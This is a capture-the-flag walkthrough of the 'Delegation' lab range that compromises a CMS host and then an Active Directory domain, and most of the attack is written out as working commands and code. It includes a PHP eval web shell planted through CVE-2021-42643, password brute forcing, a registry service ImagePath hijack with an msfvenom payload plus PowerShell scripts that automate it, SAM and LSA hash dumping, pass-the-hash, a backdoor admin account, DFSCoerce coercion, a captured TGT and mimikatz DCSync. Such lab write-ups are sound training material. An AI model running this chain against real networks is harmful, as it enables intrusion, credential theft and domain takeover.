春秋云镜-Delegation


zzdzz, 3 December 2025

References

https://blog.csdn.net/uuzeray/article/details/141792817
https://blog.csdn.net/weixin_63576152/article/details/133828891
https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/

Entry host

39.99.155.135

fscan results

PS G:\tool\护\工具打> G:\tool\护\工具打包\fscan322.exe -h 39.99.155.135

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.155.135:22 open
39.99.155.135:21 open
39.99.155.135:80 open
39.99.155.135:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.155.135      code:200 len:68108  title:中文网页标题

dirsearch finds the admin login page.

The environment seemed to be broken at first; restarting it fixed that (the range came back on a different public IP, which is why the exploit URL below differs from the address scanned above).

Log in to the backend with the weak credential:

admin/123456

The CMS is affected by CVE-2021-42643, an authenticated arbitrary file write through the template save function. Request:

url

http://39.99.226.251/index.php?case=template&act=save&admin_dir=admin&site=default

body

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[1]);?>

The _d_ tokens in sid stand for path separators, so the "template" is written outside the template directory as 1.php. A response of ok means the file was written; the web shell then executes whatever PHP is sent in POST parameter 1.

A vshell implant gives a session as www-data, which cannot read the flag, so look for a privilege escalation path. Start with SUID binaries:

find / -user root -perm -4000 -print 2>/dev/null

SUID diff: arbitrary file read

diff is SUID root. That does not yield a root shell, but the GTFOBins diff trick reads any file with root's privileges, which is all the first flag needs:

diff --line-format=%L /dev/null /home/flag/flag01.txt

This gives flag01:

flag01: flag{8920753c-b987-4017-997f-9589f88ac237}

The flag file also carries a hint:

Here is the hint: WIN19\Adrian

Then the usual three steps: upload fscan, scan the internal network, and set up a tunnel (the tunnel setup is not shown in this write-up; the proxychains commands below assume one is in place).

www-data@localhost:/tmp$ ./fscan -h 172.22.4.36/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] OsInfo 172.22.4.7   (Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

The hint points at WIN19, i.e. 172.22.4.45. The scan shows SMB (445) open on it (the author also notes RDP on 3389), and the hint supplies a local username, so the next step is to brute-force Adrian's password:

proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

STATUS_PASSWORD_EXPIRED is a hit, not a miss: babygirl1 is the correct password, it has merely expired, which is why crackmapexec still marks the line with [-]. An RDP logon with it prompts for a new password; set qwer1234@. (Without RDP, impacket's smbpasswd.py / changepasswd.py can change an expired password without an interactive logon.)

The resulting session is an ordinary local user with no useful privileges.

Windows privilege escalation

There are hints on the desktop, though. The important one is an HTML file noting that the user can modify a service's registry key.

Specifically, the report flags the gupdate service: its registry key grants broad modification rights, including changing its configuration and deleting or creating values. A writable service key means ImagePath can be pointed at any binary, and the Service Control Manager will launch that binary with the service's own privileges the next time the service starts, which is enough here to dump the SAM.

First generate the payload with msfvenom. The -f exe-service format matters: it wraps the command in a proper service binary that completes the SCM handshake, whereas a plain executable started as a service is terminated by the SCM when the start times out (error 1053):

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat ' --platform windows -f exe-service > a.exe

Then write sam.bat with the following content and upload both files to the Windows host:

reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

Point the service's ImagePath at the payload:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

and start the service from cmd:

sc start gupdate
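The same privilege escalation as an added PowerShell example; this is not code from the original write-up. Get-WritableServiceKey finds every service whose registry key the current user can modify (the class of weakness the desktop report described for gupdate), and Invoke-ServiceImagePathHijack performs the reg add / sc start steps above, but saves and restores the original ImagePath so the service is not left pointing at the payload. The default service name and payload path are the write-up's gupdate and a.exe; on any other host they are assumptions to replace.

```powershell
# Added example, not code from the original write-up. Get-WritableServiceKey
# finds services whose registry key the current user can modify (the weakness
# the desktop report described for gupdate); Invoke-ServiceImagePathHijack
# performs the reg add / sc start steps by hand, but saves and restores the
# original ImagePath. Defaults are the write-up's values and are assumptions
# for any other host.

# Rights that let a caller change ImagePath or add values, plus the generic
# GENERIC_WRITE (0x40000000) / GENERIC_ALL (0x10000000) bits some ACEs carry.
$WriteMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl' -bor 0x40000000 -bor 0x10000000

function Get-WritableServiceKey {
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })   # user SID + every group in the token

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }   # no READ_CONTROL on the key: skip it
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($sids -notcontains $aceSid) { continue }
            if (([int]$ace.RegistryRights -band $WriteMask) -eq 0) { continue }
            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                RunsAs    = $props.ObjectName      # LocalSystem is the interesting case
                ImagePath = $props.ImagePath
            }
        }
    }
}

function Invoke-ServiceImagePathHijack {
    param(
        [string]$Service = 'gupdate',                        # from the write-up
        [string]$Payload = 'C:\Users\Adrian\Desktop\a.exe',  # msfvenom -f exe-service binary
        [int]$WaitSeconds = 10
    )
    $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service"
    $orig = (Get-ItemProperty -Path $path -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
    Set-ItemProperty -Path $path -Name ImagePath -Value $Payload -Type ExpandString
    try {
        # The SCM launches the new ImagePath under the service account. An
        # exe-service payload completes the service handshake, so the SCM
        # accepts it as a running service instead of failing with error 1053.
        sc.exe start $Service | Out-Null
        Start-Sleep -Seconds $WaitSeconds
    } finally {
        # Put the original value back so the service is not left broken.
        if ($null -ne $orig) { Set-ItemProperty -Path $path -Name ImagePath -Value $orig -Type ExpandString }
        else                 { Remove-ItemProperty -Path $path -Name ImagePath -ErrorAction SilentlyContinue }
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
# Invoke-ServiceImagePathHijack        # defaults to gupdate and a.exe as in the write-up
```

Get-WritableServiceKey only reports keys whose ACL the user can read; a key that is writable but not readable would be missed, which is why accesschk-style tools are still worth running in parallel. If the service is already running, sc.exe start fails and the payload never executes; stop it first or reboot if the ACL allows.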

Three files appear on the desktop. Copy them to Kali and extract the hashes offline with secretsdump:

secretsdump.py LOCAL -system system -sam sam -security security
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798

The Administrator line is the local administrator's NT hash from the SAM; $MACHINE.ACC, from the LSA secrets, is the NT hash of the WIN19$ computer account, which is a valid domain credential and is used as one below.

Pass the local Administrator hash to get a SYSTEM shell on WIN19:

proxychains psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

flag02

flag02: flag{2cf8a94a-2194-46fd-911e-b77173dfc242}

For convenience, create a local administrator account:

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

Domain controller hashes

Collect BloodHound data, authenticating as the WIN19$ machine account with the hash recovered from the LSA secrets:

proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

The intended path is unconstrained delegation between WIN19 and DC01: WIN19 is trusted for unconstrained delegation, so any principal that authenticates to it with Kerberos leaves a forwardable TGT in WIN19's memory. The attack is therefore to coerce DC01 into authenticating to WIN19 and capture the DC01$ TGT; DFSCoerce is the trigger used here (the article 红队域渗透NTLM Relay:强制认证方式总结 surveys the other coercion primitives).
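An added check that is not from the original write-up: the PowerShell below confirms, with a raw LDAP query and no RSAT modules, which non-DC accounts are trusted for unconstrained delegation, which is the fact BloodHound's collection surfaces for WIN19. It is meant to run from a domain-joined host such as WIN19 once the local admin account exists; the DC and base DN are the range's, and binding with the current logon session is an assumption (pass a username and password to the DirectoryEntry constructor otherwise).

```powershell
# Added example, not code from the original write-up: list the non-DC accounts
# that are trusted for unconstrained delegation using a raw LDAP query, the
# same fact BloodHound reports for WIN19. Run from a domain-joined host.
# Assumptions: the DC / base DN below are the range's, and the current logon
# session is used for the bind.

$TRUSTED_FOR_DELEGATION       = 0x80000                   # userAccountControl bit
$LDAP_MATCHING_RULE_BIT_AND   = '1.2.840.113556.1.4.803'  # LDAP bitwise-AND matching rule
$DOMAIN_CONTROLLERS_GROUP_RID = 516                       # DCs always carry the bit; skip them

function Get-UnconstrainedDelegation {
    param(
        [string]$Server = 'dc01.xiaorang.lab',
        [string]$BaseDn = 'DC=xiaorang,DC=lab'
    )
    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server/$BaseDn")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # Computers and users with TRUSTED_FOR_DELEGATION set, excluding domain controllers
    $searcher.Filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
                       "(userAccountControl:$($LDAP_MATCHING_RULE_BIT_AND):=$($TRUSTED_FOR_DELEGATION))" +
                       "(!(primaryGroupID=$($DOMAIN_CONTROLLERS_GROUP_RID))))"
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'dNSHostName', 'userAccountControl'))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        [pscustomobject]@{
            Account = [string]$p['samaccountname'][0]
            DnsName = [string]$p['dnshostname'][0]          # empty for user objects
            UAC     = ('0x{0:X}' -f [int]$p['useraccountcontrol'][0])
        }
    }
}

# Expected on this range: WIN19$ / win19.xiaorang.lab with the 0x80000 bit set
Get-UnconstrainedDelegation | Format-Table -AutoSize
```

When WIN19 appears in that output, the capture side of the attack is Rubeus on WIN19 waiting for incoming tickets; the usual invocation is Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$, whose flags are Rubeus's documented ones, though the write-up itself does not show its command. Coercing DC01 works because a domain controller's machine account is not protected against delegation; an account marked "sensitive and cannot be delegated" or placed in Protected Users would not hand over a usable TGT.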

Log on to WIN19 with the newly created admin account and run Rubeus with administrator rights in monitor mode, so that it captures the TGT when DC01 connects (the write-up does not show the exact Rubeus command).

Then use DFSCoerce to force DC01 (the domain's only DC; the original calls it the "secondary DC") to authenticate to WIN19:

https://github.com/Wh04m1001/DFSCoerce

proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab win19 172.22.4.7

The listener argument is the host name win19 rather than its IP on purpose: the DC has to reach WIN19 by name for the authentication to use Kerberos, which is what produces the delegated TGT; with an IP it would fall back to NTLM and nothing usable would arrive.

Rubeus prints the captured DC01$ TGT as base64. Decode it locally and save it as DC01.kirbi:

echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6NzUbFzvS6GDmmjptoTeLk227VKJtbm8iM2OssA8hx1tfTIi3L3sKxOKXWEDw0jhyHMKTRJj6gv+mI75IYtS4OyrY6fQfsTZIh9gFmPnMGeTni7Tm5ZdTIjVwmnwbTtXfKyjdkaAEHMfaDEY3O2L1z8XZNZLbEYHUN6fNpvJF4kr8KtUpk3QE/2NEtWILzAUQRjCnTh3GoYYQ7xI/vdvKArITTQgaN09l8Onk92fdA9ZqXiO8YR60uS9+oQNz1fg7Ns064f5WgdknLyJglPn/JENsUgqPGB9F7395TKYiXN4N8K/oYPG0liUYBzmByOlmuFjlUtY0VzJAol11hS9Bzfk6w0+DoLwC4wFqTxPggvFsvQ+27o5rt/hCFDM+yM7fSVi/BPDQtelRVh1UuKeNqSwXSyGTSaKMKzpZ7EIe5FETY7at2kwyLPFm3LExDvxWIngIhAFsqG1quE85B8LSTnzCE+Yvk1soY5zkhi/0xD7Akkj8wBqR/7MKQIGx24fLr69g/nBPBRpPQUeywEz3+IGa0hjNi8+Q8G94xzZeWzbXdwdpYx9ISAco98/X4ST8rebk+RE0owHGqIFXSKFWlH6kT6oUtVuMXaCSaZ20JE9Mbm3iJJgu8wxSI1YpKCvVHkzq3qmFKqg4zqPTN1krXmqxJX1LEo3oicR4mugRKbW8Oklnq7Zz2r5nwII7LR+FGcFVymWtsnSxI75nSUgOoct6NG4AUvcYBkd+bOLIPZr5ats0arr5bXVGM039ILNkTGM0qg78vd3ohhi3Q9RiFsVtiTgdxk+ki+3QhVidg2QS+mN1J6gXALxAG4a51D1c4nq0IlpNB6vvC6BWP5CQA5SCem9YJR8AI2V2HDjbNm4PJhNd2mMsFm/3n7j8QAZo91FIQcblPNBiFdgJa8qoueNWD2KYMND/d2bBEJwJwJhHGapF3sssXIdiSfNjuKyq4cKCLe1nu3UZts+fMI0ZqajrjuoywjfrHa9ST/cxwsmBxYt6K909+Y86XhaEngFMYCMnR0UtO47sUCaM9Q4imue0Sz30vbTV6AxIZ5J14hfh2L8e0yyBVNrM0vakW4wiO/VRbr70xwW3QENDtghpuA9vKB3m7Iy6s2xl1K2OyUdZUiOuo1Jq5NtyXUZXLFIPM3ykQ++MNYvEcm495SvJFM8glsokgzr69+bXyPLjg4jAKcbmhSmDgff32uoGeTApJ3oDCqZwwGRb80+fXxIETj0fFlmioHaoylld6qZp/hDD0KniK84Uk464WBpVIw8n4roscn8FxZr9b/k7azO4AazuJYtyKTrCp7QB2QfmBER2M6LNtIzzSndiZL9wJPgl87B1aWZj7G49VafHOmkRmeannAwyEmyXYZwR9PmCLVJO84xBCSTbnx7O8EggYmSHIZKWGHE/jq1sS1l0xTAvdBXhHgvrTO2D2joOdTB+jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCUOndjz8eZXqUhq6SnrOz+ulJ875dy6f1GiArW34YNx6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MTEwMTEyMjk0N1qmERgPMjAyNTExMDEyMjI5NDdapxEYDzIwMjUxMTA4MTIyOTQ3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

Upload mimikatz to WIN19, inject the ticket into the session and DCSync the domain administrator (the same .kirbi can be converted with impacket's ticketConverter.py and used from Linux with secretsdump.py over Kerberos instead):

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

Lateral movement to the remaining hosts

The DCSync output includes the domain Administrator's NT hash; pass it to the hosts not yet compromised to collect the last two flags:

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19
type C:\users\administrator\flag\flag03.txt

flag03

flag03: flag{8f996e05-dd76-4a8b-90d8-345b118d4093}

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.7
type C:\users\administrator\flag\flag04.txt

flag04

flag04: flag{a48690f7-911c-487a-998b-e1cc40b70a1f}

